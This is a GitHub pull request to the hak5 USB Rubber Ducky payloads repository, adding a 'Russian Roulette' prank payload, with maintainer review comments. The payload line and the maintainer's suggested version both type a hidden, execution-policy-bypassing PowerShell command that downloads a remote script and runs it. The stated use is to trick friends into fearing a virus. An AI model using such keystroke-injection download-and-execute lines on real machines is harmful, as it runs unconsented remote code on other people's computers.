-
Notifications
You must be signed in to change notification settings - Fork 1.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added Russian Roulette #515
base: master
Are you sure you want to change the base?
Conversation
This payload forces the user to play a game of Russian Roulette
REM Version: 1.0 | ||
REM Category: Prank | ||
REM Source: https://github.com/Phishing-Tides/Hak5_RubberDucky_Payloads | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If your payload is designed to target windows, please consider using the PASSIVE_WINDOWS_DETECT
extension this allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay
DELAY 500 | ||
DELETE | ||
DELAY 100 | ||
STRING powershell -w h -NoP -NonI -Exec Bypass -Command "Start-Process powershell -ArgumentList '-NoP -NonI -Exec Bypass -w h -Command iex (iwr https://raw.githubusercontent.com/Thomas-Tubinas/Hak5/refs/heads/main/russianroulette.ps1?dl=1)' -WindowStyle Hidden" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please read https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads
Staged payloads are not allowed. Please include the source code for the ps1
file inside of your PR and include a notice that the user is required to host the file.
Include the script in the directory with your payload
Provide instructions for the user to move the script to the appropriate hosting service.
Provide a DEFINE with the placeholder example.com for the user to easily configure once they have hosted the script
DEFINE #URL example.com/ps1
STRINGLN powershell -w h -NoP -NonI -Exec Bypass -Command "Start-Process powershell -ArgumentList '-NoP -NonI -Exec Bypass -w h -Command iex (iwr #URL)' -WindowStyle Hidden"
Added PowerShell script that runs on the rubber ducky
Added Passive Windows Detect to Payload
I went back and made some changes to the pr. please let me know if i missed anything. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I went back and made some changes to the pr. please let me know if i missed anything.
What does it do: User is forced to play a game of Russian Roulette
How can people use this payload: This payload can be used to prank friends into thinking that a virus will be installed on their computer if they don't win. It's also fun to see them react when they don't win the game and are rewarded with a rickroll for losing.